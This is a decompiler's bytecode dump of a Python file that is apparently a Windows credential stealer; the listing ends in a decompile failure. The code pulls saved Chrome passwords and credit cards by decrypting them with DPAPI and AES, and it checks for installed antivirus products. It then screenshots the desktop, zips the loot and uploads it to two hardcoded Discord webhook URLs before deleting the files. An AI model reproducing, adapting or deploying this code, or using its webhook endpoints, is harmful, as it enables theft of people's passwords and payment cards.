
# file test/17502.pyc
# --- This code section failed: ---

 L.  12         0  LOAD_CONST               0
                2  LOAD_CONST               None
                4  IMPORT_NAME              os
                6  STORE_NAME               os

 L.  13         8  LOAD_NAME                os
               10  LOAD_ATTR                name
               12  LOAD_STR                 'nt'
               14  COMPARE_OP               !=
               16  POP_JUMP_IF_FALSE    24  'to 24'

 L.  14        18  LOAD_NAME                exit
               20  CALL_FUNCTION_0       0  ''
               22  POP_TOP          
             24_0  COME_FROM            16  '16'

 L.  15        24  LOAD_CONST               0
               26  LOAD_CONST               None
               28  IMPORT_NAME              sys
               30  STORE_NAME               sys

 L.  16        32  LOAD_CONST               0
               34  LOAD_CONST               None
               36  IMPORT_NAME              shutil
               38  STORE_NAME               shutil

 L.  17        40  LOAD_CONST               0
               42  LOAD_CONST               None
               44  IMPORT_NAME              sqlite3
               46  STORE_NAME               sqlite3

 L.  18        48  LOAD_CONST               0
               50  LOAD_CONST               None
               52  IMPORT_NAME              pywintypes
               54  STORE_NAME               pywintypes

 L.  19        56  LOAD_CONST               0
               58  LOAD_CONST               None
               60  IMPORT_NAME              win32gui
               62  STORE_NAME               win32gui

 L.  20        64  LOAD_CONST               0
               66  LOAD_CONST               None
               68  IMPORT_NAME              json
               70  STORE_NAME               json

 L.  21        72  LOAD_CONST               0
               74  LOAD_CONST               None
               76  IMPORT_NAME              base64
               78  STORE_NAME               base64

 L.  22        80  LOAD_CONST               0
               82  LOAD_CONST               None
               84  IMPORT_NAME              requests
               86  STORE_NAME               requests

 L.  23        88  LOAD_CONST               0
               90  LOAD_CONST               None
               92  IMPORT_NAME              platform
               94  STORE_NAME               platform

 L.  24        96  LOAD_CONST               0
               98  LOAD_CONST               None
              100  IMPORT_NAME              zipfile
              102  STORE_NAME               zipfile

 L.  25       104  LOAD_CONST               0
              106  LOAD_CONST               None
              108  IMPORT_NAME              smtplib
              110  STORE_NAME               smtplib

 L.  26       112  LOAD_CONST               0
              114  LOAD_CONST               None
              116  IMPORT_NAME_ATTR         http.cookiejar
              118  IMPORT_FROM              cookiejar
              120  STORE_NAME               cookiejar
              122  POP_TOP          

 L.  27       124  LOAD_CONST               0
              126  LOAD_CONST               ('urlencode',)
              128  IMPORT_NAME_ATTR         urllib.parse
              130  IMPORT_FROM              urlencode
              132  STORE_NAME               urlencode
              134  POP_TOP          

 L.  28       136  LOAD_CONST               0
              138  LOAD_CONST               None
              140  IMPORT_NAME              ctypes
              142  STORE_NAME               ctypes

 L.  29       144  LOAD_CONST               0
              146  LOAD_CONST               None
              148  IMPORT_NAME_ATTR         ctypes.wintypes
              150  STORE_NAME               ctypes

 L.  30       152  LOAD_CONST               0
              154  LOAD_CONST               None
              156  IMPORT_NAME              win32con
              158  STORE_NAME               win32con

 L.  31       160  LOAD_CONST               0
              162  LOAD_CONST               None
              164  IMPORT_NAME              win32api
              166  STORE_NAME               win32api

 L.  32       168  LOAD_CONST               0
              170  LOAD_CONST               None
              172  IMPORT_NAME              cryptography
              174  STORE_NAME               cryptography

 L.  33       176  LOAD_CONST               0
              178  LOAD_CONST               ('copyfile',)
              180  IMPORT_NAME              shutil
              182  IMPORT_FROM              copyfile
              184  STORE_NAME               copyfile
              186  POP_TOP          

 L.  34       188  LOAD_CONST               0
              190  LOAD_CONST               ('encoders',)
              192  IMPORT_NAME              email
              194  IMPORT_FROM              encoders
              196  STORE_NAME               encoders
              198  POP_TOP          

 L.  35       200  LOAD_CONST               0
              202  LOAD_CONST               ('findall',)
              204  IMPORT_NAME              re
              206  IMPORT_FROM              findall
              208  STORE_NAME               findall
              210  POP_TOP          

 L.  36       212  LOAD_CONST               0
              214  LOAD_CONST               ('loads', 'dumps')
              216  IMPORT_NAME              json
              218  IMPORT_FROM              loads
              220  STORE_NAME               loads
              222  IMPORT_FROM              dumps
              224  STORE_NAME               dumps
              226  POP_TOP          

 L.  37       228  LOAD_CONST               0
              230  LOAD_CONST               ('b64decode',)
              232  IMPORT_NAME              base64
              234  IMPORT_FROM              b64decode
              236  STORE_NAME               b64decode
              238  POP_TOP          

 L.  38       240  LOAD_CONST               0
              242  LOAD_CONST               ('Popen', 'PIPE')
              244  IMPORT_NAME              subprocess
              246  IMPORT_FROM              Popen
              248  STORE_NAME               Popen
              250  IMPORT_FROM              PIPE
              252  STORE_NAME               PIPE
              254  POP_TOP          

 L.  39       256  LOAD_CONST               0
              258  LOAD_CONST               ('Request', 'urlopen')
              260  IMPORT_NAME_ATTR         urllib.request
              262  IMPORT_FROM              Request
              264  STORE_NAME               Request
              266  IMPORT_FROM              urlopen
              268  STORE_NAME               urlopen
              270  POP_TOP          

 L.  40       272  LOAD_CONST               0
              274  LOAD_CONST               ('datetime',)
              276  IMPORT_NAME              datetime
              278  IMPORT_FROM              datetime
              280  STORE_NAME               datetime
              282  POP_TOP          

 L.  41       284  LOAD_CONST               0
              286  LOAD_CONST               ('Thread',)
              288  IMPORT_NAME              threading
              290  IMPORT_FROM              Thread
              292  STORE_NAME               Thread
              294  POP_TOP          

 L.  42       296  LOAD_CONST               0
              298  LOAD_CONST               ('sleep',)
              300  IMPORT_NAME              time
              302  IMPORT_FROM              sleep
              304  STORE_NAME               sleep
              306  POP_TOP          

 L.  43       308  LOAD_CONST               0
              310  LOAD_CONST               ('argv',)
              312  IMPORT_NAME              sys
              314  IMPORT_FROM              argv
              316  STORE_NAME               argv
              318  POP_TOP          

 L.  44       320  LOAD_CONST               0
              322  LOAD_CONST               ('ImageGrab',)
              324  IMPORT_NAME              PIL
              326  IMPORT_FROM              ImageGrab
              328  STORE_NAME               ImageGrab
              330  POP_TOP          

 L.  45       332  LOAD_CONST               0
              334  LOAD_CONST               ('Webhook', 'File')
              336  IMPORT_NAME              dhooks
              338  IMPORT_FROM              Webhook
              340  STORE_NAME               Webhook
              342  IMPORT_FROM              File
              344  STORE_NAME               File
              346  POP_TOP          

 L.  46       348  LOAD_CONST               0
              350  LOAD_CONST               ('AES',)
              352  IMPORT_NAME_ATTR         Crypto.Cipher
              354  IMPORT_FROM              AES
              356  STORE_NAME               AES
              358  POP_TOP          

 L.  47       360  LOAD_CONST               0
              362  LOAD_CONST               ('default_backend',)
              364  IMPORT_NAME_ATTR         cryptography.hazmat.backends
              366  IMPORT_FROM              default_backend
              368  STORE_NAME               default_backend
              370  POP_TOP          

 L.  48       372  LOAD_CONST               0
              374  LOAD_CONST               ('Cipher', 'algorithms', 'modes')
              376  IMPORT_NAME_ATTR         cryptography.hazmat.primitives.ciphers
              378  IMPORT_FROM              Cipher
              380  STORE_NAME               Cipher
              382  IMPORT_FROM              algorithms
              384  STORE_NAME               algorithms
              386  IMPORT_FROM              modes
              388  STORE_NAME               modes
              390  POP_TOP          

 L.  49       392  LOAD_CONST               0
              394  LOAD_CONST               ('AESGCM',)
              396  IMPORT_NAME_ATTR         cryptography.hazmat.primitives.ciphers.aead
              398  IMPORT_FROM              AESGCM
              400  STORE_NAME               AESGCM
              402  POP_TOP          

 L.  52       404  LOAD_NAME                Webhook

 L.  53       406  LOAD_STR                 'https://discord.com/api/webhooks/847938779599732816/5qIZprHjvzpta7RnnHIsSoox_qY__rG29Oz_Fq_A01BXkqkr1ky7ZX31qpiX5zJbEmjs'

 L.  52       408  CALL_FUNCTION_1       1  ''
              410  STORE_NAME               hook

 L.  55       412  LOAD_NAME                Webhook

 L.  56       414  LOAD_STR                 'https://discord.com/api/webhooks/847939057644339281/3bruU-Rx5H8Tk--Kmk5KMwjnSXVwEymC4RxsPOh10n_N-6Y7NyqJ9dN28effwybpRnTh'

 L.  55       416  CALL_FUNCTION_1       1  ''
              418  STORE_NAME               hooks

 L.  58       420  LOAD_NAME                os
              422  LOAD_ATTR                environ
              424  LOAD_STR                 'LOCALAPPDATA'
              426  BINARY_SUBSCR    
              428  STORE_NAME               APP_DATA_PATH

 L.  59       430  LOAD_STR                 'Google\\Chrome\\User Data\\Default\\Login Data'
              432  STORE_NAME               DB_PATH

 L.  61       434  LOAD_CONST               12
              436  STORE_NAME               NONCE_BYTE_SIZE

 L.  64       438  LOAD_CODE                <code_object encrypt>
              440  LOAD_STR                 'encrypt'
              442  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              444  STORE_NAME               encrypt

 L.  71       446  LOAD_CODE                <code_object decrypt>
              448  LOAD_STR                 'decrypt'
              450  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              452  STORE_NAME               decrypt

 L.  77       454  LOAD_CODE                <code_object get_cipher>
              456  LOAD_STR                 'get_cipher'
              458  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              460  STORE_NAME               get_cipher

 L.  86       462  LOAD_CODE                <code_object decryptionDPAPI>
              464  LOAD_STR                 'decryptionDPAPI'
              466  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              468  STORE_NAME               decryptionDPAPI

 L. 106       470  LOAD_CODE                <code_object unix_decrypt>
              472  LOAD_STR                 'unix_decrypt'
              474  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              476  STORE_NAME               unix_decrypt

 L. 125       478  LOAD_CODE                <code_object localdata_key>
              480  LOAD_STR                 'localdata_key'
              482  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              484  STORE_NAME               localdata_key

 L. 132       486  LOAD_CODE                <code_object aes_decrypt>
              488  LOAD_STR                 'aes_decrypt'
              490  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              492  STORE_NAME               aes_decrypt

 L. 142       494  LOAD_BUILD_CLASS 
              496  LOAD_CODE                <code_object ChromePassword>
              498  LOAD_STR                 'ChromePassword'
              500  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              502  LOAD_STR                 'ChromePassword'
              504  CALL_FUNCTION_2       2  ''
              506  STORE_NAME               ChromePassword

 L. 191       508  LOAD_NAME                __name__
              510  LOAD_STR                 '__main__'
              512  COMPARE_OP               ==
          514_516  POP_JUMP_IF_FALSE   540  'to 540'

 L. 192       518  LOAD_NAME                ChromePassword
              520  CALL_FUNCTION_0       0  ''
              522  STORE_NAME               Main

 L. 193       524  LOAD_NAME                Main
              526  LOAD_METHOD              get_chrome_db
              528  CALL_METHOD_0         0  ''
              530  POP_TOP          

 L. 194       532  LOAD_NAME                Main
              534  LOAD_METHOD              save_passwords
              536  CALL_METHOD_0         0  ''
              538  POP_TOP          
            540_0  COME_FROM           514  '514'

 L. 196       540  LOAD_NAME                os
              542  LOAD_ATTR                path
              544  LOAD_METHOD              exists
              546  LOAD_STR                 'C:\\Program Files\\Windows Defender'
              548  CALL_METHOD_1         1  ''
          550_552  POP_JUMP_IF_FALSE   558  'to 558'

 L. 197       554  LOAD_STR                 'Windows Defender'
              556  STORE_NAME               av
            558_0  COME_FROM           550  '550'

 L. 198       558  LOAD_NAME                os
              560  LOAD_ATTR                path
              562  LOAD_METHOD              exists
              564  LOAD_STR                 'C:\\Program Files\\AVAST Software\\Avast'
              566  CALL_METHOD_1         1  ''
          568_570  POP_JUMP_IF_FALSE   576  'to 576'

 L. 199       572  LOAD_STR                 'Avast'
              574  STORE_NAME               av
            576_0  COME_FROM           568  '568'

 L. 200       576  LOAD_NAME                os
              578  LOAD_ATTR                path
              580  LOAD_METHOD              exists
              582  LOAD_STR                 'C:\\Program Files\\AVG\\Antivirus'
              584  CALL_METHOD_1         1  ''
          586_588  POP_JUMP_IF_FALSE   594  'to 594'

 L. 201       590  LOAD_STR                 'AVG'
              592  STORE_NAME               av
            594_0  COME_FROM           586  '586'

 L. 202       594  LOAD_NAME                os
              596  LOAD_ATTR                path
              598  LOAD_METHOD              exists
              600  LOAD_STR                 'C:\\Program Files\\Avira\\Launcher'
              602  CALL_METHOD_1         1  ''
          604_606  POP_JUMP_IF_FALSE   612  'to 612'

 L. 203       608  LOAD_STR                 'Avira'
              610  STORE_NAME               av
            612_0  COME_FROM           604  '604'

 L. 204       612  LOAD_NAME                os
              614  LOAD_ATTR                path
              616  LOAD_METHOD              exists
              618  LOAD_STR                 'C:\\Program Files\\IObit\\Advanced SystemCare'
              620  CALL_METHOD_1         1  ''
          622_624  POP_JUMP_IF_FALSE   630  'to 630'

 L. 205       626  LOAD_STR                 'Advanced SystemCare'
              628  STORE_NAME               av
            630_0  COME_FROM           622  '622'

 L. 206       630  LOAD_NAME                os
              632  LOAD_ATTR                path
              634  LOAD_METHOD              exists
              636  LOAD_STR                 'C:\\Program Files\\Bitdefender Antivirus Free'
              638  CALL_METHOD_1         1  ''
          640_642  POP_JUMP_IF_FALSE   648  'to 648'

 L. 207       644  LOAD_STR                 'Bitdefender'
              646  STORE_NAME               av
            648_0  COME_FROM           640  '640'

 L. 208       648  LOAD_NAME                os
              650  LOAD_ATTR                path
              652  LOAD_METHOD              exists
              654  LOAD_STR                 'C:\\Program Files\\COMODO\\COMODO Internet Security'
              656  CALL_METHOD_1         1  ''
          658_660  POP_JUMP_IF_FALSE   666  'to 666'

 L. 209       662  LOAD_STR                 'Comodo'
              664  STORE_NAME               av
            666_0  COME_FROM           658  '658'

 L. 210       666  LOAD_NAME                os
              668  LOAD_ATTR                path
              670  LOAD_METHOD              exists
              672  LOAD_STR                 'C:\\Program Files\\DrWeb'
              674  CALL_METHOD_1         1  ''
          676_678  POP_JUMP_IF_FALSE   684  'to 684'

 L. 211       680  LOAD_STR                 'Dr.Web'
              682  STORE_NAME               av
            684_0  COME_FROM           676  '676'

 L. 212       684  LOAD_NAME                os
              686  LOAD_ATTR                path
              688  LOAD_METHOD              exists
              690  LOAD_STR                 'C:\\Program Files\\ESET\\ESET Security'
              692  CALL_METHOD_1         1  ''
          694_696  POP_JUMP_IF_FALSE   702  'to 702'

 L. 213       698  LOAD_STR                 'ESET'
              700  STORE_NAME               av
            702_0  COME_FROM           694  '694'

 L. 214       702  LOAD_NAME                os
              704  LOAD_ATTR                path
              706  LOAD_METHOD              exists
              708  LOAD_STR                 'C:\\Program Files\\GRIZZLY Antivirus'
              710  CALL_METHOD_1         1  ''
          712_714  POP_JUMP_IF_FALSE   720  'to 720'

 L. 215       716  LOAD_STR                 'Grizzly Pro'
              718  STORE_NAME               av
            720_0  COME_FROM           712  '712'

 L. 216       720  LOAD_NAME                os
              722  LOAD_ATTR                path
              724  LOAD_METHOD              exists
              726  LOAD_STR                 'C:\\Program Files\\Kaspersky Lab'
              728  CALL_METHOD_1         1  ''
          730_732  POP_JUMP_IF_FALSE   738  'to 738'

 L. 217       734  LOAD_STR                 'Kaspersky'
              736  STORE_NAME               av
            738_0  COME_FROM           730  '730'

 L. 218       738  LOAD_NAME                os
              740  LOAD_ATTR                path
              742  LOAD_METHOD              exists
              744  LOAD_STR                 'C:\\Program Files\\IObit\\IObit Malware Fighter'
              746  CALL_METHOD_1         1  ''
          748_750  POP_JUMP_IF_FALSE   756  'to 756'

 L. 219       752  LOAD_STR                 'Malware fighter'
              754  STORE_NAME               av
            756_0  COME_FROM           748  '748'

 L. 220       756  LOAD_NAME                os
              758  LOAD_ATTR                path
              760  LOAD_METHOD              exists
              762  LOAD_STR                 'C:\\Program Files\\360\\Total Security'
              764  CALL_METHOD_1         1  ''
          766_768  POP_JUMP_IF_FALSE   776  'to 776'

 L. 221       770  LOAD_STR                 '360 Total Security'
              772  STORE_NAME               av
              774  JUMP_FORWARD        776  'to 776'
            776_0  COME_FROM           774  '774'
            776_1  COME_FROM           766  '766'

 L. 226       776  LOAD_NAME                ImageGrab
              778  LOAD_METHOD              grab
              780  CALL_METHOD_0         0  ''
              782  STORE_NAME               screen

 L. 227       784  LOAD_NAME                screen
              786  LOAD_METHOD              save
              788  LOAD_NAME                os
              790  LOAD_METHOD              getenv
              792  LOAD_STR                 'ProgramData'
              794  CALL_METHOD_1         1  ''
              796  LOAD_STR                 '\\Screenshot.jpg'
              798  BINARY_ADD       
              800  CALL_METHOD_1         1  ''
              802  POP_TOP          

 L. 228       804  LOAD_NAME                open
              806  LOAD_STR                 'C:\\ProgramData\\Screenshot.jpg'
              808  LOAD_STR                 'rb'
              810  CALL_FUNCTION_2       2  ''
              812  STORE_NAME               screen

 L. 229       814  LOAD_NAME                screen
              816  LOAD_METHOD              close
              818  CALL_METHOD_0         0  ''
              820  POP_TOP          

 L. 230       822  LOAD_NAME                File
              824  LOAD_STR                 'C:\\ProgramData\\Screenshot.jpg'
              826  CALL_FUNCTION_1       1  ''
              828  STORE_NAME               screenshot

 L. 233       830  LOAD_STR                 'C:\\\\ProgramData\\\\Passwords.zip'
              832  STORE_NAME               zname

 L. 234       834  LOAD_NAME                zipfile
              836  LOAD_METHOD              ZipFile
              838  LOAD_NAME                zname
              840  LOAD_STR                 'w'
              842  CALL_METHOD_2         2  ''
              844  STORE_NAME               newzip

 L. 235       846  LOAD_NAME                newzip
              848  LOAD_METHOD              write
              850  LOAD_STR                 'C:\\\\ProgramData\\\\Passwords.txt'
              852  CALL_METHOD_1         1  ''
              854  POP_TOP          

 L. 236       856  LOAD_NAME                newzip
              858  LOAD_METHOD              write
              860  LOAD_STR                 'C:\\\\ProgramData\\\\Screenshot.jpg'
              862  CALL_METHOD_1         1  ''
              864  POP_TOP          

 L. 237       866  LOAD_NAME                newzip
              868  LOAD_METHOD              close
              870  CALL_METHOD_0         0  ''
              872  POP_TOP          

 L. 238       874  LOAD_NAME                File
              876  LOAD_STR                 'C:\\ProgramData\\Passwords.zip'
              878  CALL_FUNCTION_1       1  ''
              880  STORE_NAME               passwords

 L. 242       882  LOAD_NAME                hook
              884  LOAD_ATTR                send
              886  LOAD_STR                 'screenshot:'
              888  LOAD_NAME                screenshot
              890  LOAD_CONST               ('file',)
              892  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              894  POP_TOP          

 L. 243       896  LOAD_NAME                hook
              898  LOAD_ATTR                send
              900  LOAD_STR                 'passwords:'
              902  LOAD_NAME                passwords
              904  LOAD_CONST               ('file',)
              906  CALL_FUNCTION_KW_2     2  '2 total positional and keyword args'
              908  POP_TOP          

 L. 244       910  LOAD_NAME                os
              912  LOAD_METHOD              remove
              914  LOAD_STR                 'C:\\ProgramData\\Passwords.txt'
              916  CALL_METHOD_1         1  ''
              918  POP_TOP          

 L. 245       920  LOAD_NAME                os
              922  LOAD_METHOD              remove
              924  LOAD_STR                 'C:\\ProgramData\\Screenshot.jpg'
              926  CALL_METHOD_1         1  ''
              928  POP_TOP          

 L. 246       930  LOAD_NAME                os
              932  LOAD_METHOD              remove
              934  LOAD_STR                 'C:\\ProgramData\\Passwords.zip'
              936  CALL_METHOD_1         1  ''
              938  POP_TOP          

 L. 251       940  LOAD_CODE                <code_object get_master_key>
              942  LOAD_STR                 'get_master_key'
              944  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              946  STORE_NAME               get_master_key

 L. 267       948  LOAD_CODE                <code_object decrypt_payload>
              950  LOAD_STR                 'decrypt_payload'
              952  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              954  STORE_NAME               decrypt_payload

 L. 271       956  LOAD_CODE                <code_object generate_cipher>
              958  LOAD_STR                 'generate_cipher'
              960  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              962  STORE_NAME               generate_cipher

 L. 275       964  LOAD_CODE                <code_object decrypt_password>
              966  LOAD_STR                 'decrypt_password'
              968  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              970  STORE_NAME               decrypt_password

 L. 288       972  LOAD_CODE                <code_object get_password>
              974  LOAD_STR                 'get_password'
              976  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              978  STORE_NAME               get_password

 L. 323       980  LOAD_CODE                <code_object get_credit_cards>
              982  LOAD_STR                 'get_credit_cards'
              984  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              986  STORE_NAME               get_credit_cards

 L. 357       988  LOAD_CODE                <code_object get_password1>
              990  LOAD_STR                 'get_password1'
              992  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              994  STORE_NAME               get_password1

 L. 392       996  LOAD_CODE                <code_object get_credit_cards1>
              998  LOAD_STR                 'get_credit_cards1'
             1000  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
             1002  STORE_NAME               get_credit_cards1
           1004_0  COME_FROM          1042  '1042'

 L. 429      1004  LOAD_NAME                get_password
             1006  CALL_FUNCTION_0       0  ''
             1008  POP_TOP          

 L. 430      1010  LOAD_NAME                get_password1
             1012  CALL_FUNCTION_0       0  ''
             1014  POP_TOP          

 L. 431      1016  LOAD_NAME                get_credit_cards
             1018  CALL_FUNCTION_0       0  ''
             1020  POP_TOP          

 L. 432      1022  LOAD_NAME                get_credit_cards1
             1024  CALL_FUNCTION_0       0  ''
             1026  POP_TOP          

 L. 433      1028  LOAD_NAME                os
             1030  LOAD_METHOD              remove
             1032  LOAD_STR                 'Loginvault.db'
             1034  CALL_METHOD_1         1  ''
             1036  POP_TOP          

 L. 434  1038_1040  JUMP_FORWARD       1046  'to 1046'
         1042_1044  JUMP_BACK          1004  'to 1004'
           1046_0  COME_FROM          1038  '1038'

Parse error at or near `JUMP_FORWARD' instruction at offset 1038_1040

Instruction context:
-> 
 L. 434  1038_1040  JUMP_FORWARD       1046  'to 1046'
            1042_1044  JUMP_BACK          1004  'to 1004'

test/17502.pyc -- 
# decompile failed
